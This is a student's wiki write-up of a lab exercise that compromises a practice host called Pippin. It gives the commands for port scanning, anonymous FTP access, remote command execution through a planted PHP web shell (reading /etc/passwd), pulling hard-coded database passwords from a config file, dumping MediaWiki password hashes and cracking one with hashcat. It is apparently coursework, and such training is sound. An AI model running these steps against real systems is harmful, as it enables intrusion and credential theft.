Exploiting Pippin - tmansfield42/Tech-Journal GitHub Wiki

Summary

In this lab we did a full run through of passive recon, active recon, initial access, discovery, and privilege escalation

Process

Deliverable 1. Provide screenshots of open ports, their services and versions.

Deliverable 2. Provide screenshots of the services as they respond to client applications like web browsers and command line clients.

Deliverable 3. Have you found any of the services particularly interesting? Please explain using annotated screenshots and brief captions or descriptions.

nmap -sV -O -A 10.0.5.2.5 to find open ports, services and version #'s

  • Found a misconfigured FTP server which you can login by doing ftp 10.0.5.25 using ftp as username and pressing enter for password

Deliverable 4. Upload a test file (give it a distinctive Safe for Work name) and provide proof that you've done so in the form of screenshots of commands and output.

put michael.txt makes a file called michael.txt in the current directory. I had to cd into /~/upload to have ample permissions to create a file

Deliverable 5. Provide evidence of remote code execution

If you do some looking around at the files available, there is one called simple-backdoor.php which allows you to run http requests to the apache server and it'll execute the command server-side

http://10.0.5.25/simple-backdoor.php?cmd=cat+/etc/passwd

Deliverable 6. What did you find and how did you find it? Can you leverage this data to your advantage?

  • Do some more looking around, if you're in the upload directory do cd .. to change back 1 directory and you'll see the LocalSettings.php file. Type get LocalSettings.php to copy it to your local machine

  • look at the file and you'll find hard-coded credentials in them under "###database settings" entry

  • Should see a mysql login with the password 1Tookie

Deliverable 7. You should be able to get into pippin as an authorized user. Provide a screenshot showing your session and cat the user-flag.

ssh [email protected]

1Tookie

Deliverable 8. Enumerate this internal data source to determine where and in what fields useful data might exist.

When you have this ssh session run the following:

mysql -u root -p

  • Password is 1Tookie

SHOW databases; - This command lists all available databses

USE mediawiki; - Opens the database called "mediawiki"

SHOW tables; - Shows all available tables

desc user; - Shows all the fields available in the "user" table

SELECT user_name, user_password FROM user; - Outputs information within the fields "user_name" and "user_password" in the "user" table

Deliverable 9. The credentials you've found are not terribly useful by themselves, you will need to use advanced hash cracking techniques to get what you need.

Copy the hashed password you see from Pippin and paste it into a new file on your local machine. It should be something like

:pbkdf2:sha512:30000:64:7zMbdjXKrFDDq4CRF5q9ow==:49ImFWdWRVz2dCDsJPj+P0Xovz153VenjKk7npuK7u5xgo21IUh+eY0QH8fQxdH/Cjx3zxZyQcfNChAnP11GNg==

You need to reformat the hash so it actually works with hashcat. This link here showed me how to do it So in this case, I took out the "pbkdf2" and the "64" from the hash. Leaving just the parts hashcat needs.

I made a new file called hash.txt which it's contents looked like this:

sha512:30000:7zMbdjXKrFDDq4CRF5q9ow==:49ImFWdWRVz2dCDsJPj+P0Xovz153VenjKk7npuK7u5xgo21IUh+eY0QH8fQxdH/Cjx3zxZyQcfNChAnP11GNg==

Also, in the interest of time I used our professor's hint to shorten the rockyou.txt list down significantly, they said the password begins with a lowercase p so I ran:

grep '^p' rockyou.txt > rockyou1.txt

Lastly, the actual hashcat command:

hashcat -m 12100 -a 0 -w 3 -o pippincracked.txt hash.txt rockyou1.txt

  • 12100 is the hash format we need

  • output file is pippincracked.txt

  • file it checks is hash.txt

  • wordlist is rockyou1.txt

hashcat finished in 1 hour 10 minutes and pippincracked.txt had these contents:

sha512:30000:7zMbdjXKrFDDq4CRF5q9ow==:49ImFWdWRVz2dCDsJPj+P0Xovz153VenjKk7npuK7u5xgo21IUh+eY0QH8fQxdH/Cjx3zxZyQcfNChAnP11GNg==:palentir

The password was palentir for the mysql user Pippin

I went back to mediawiki (10.0.5.25) and logged into the user Pippin with the password palentir and made myself a page because no one had done that yet.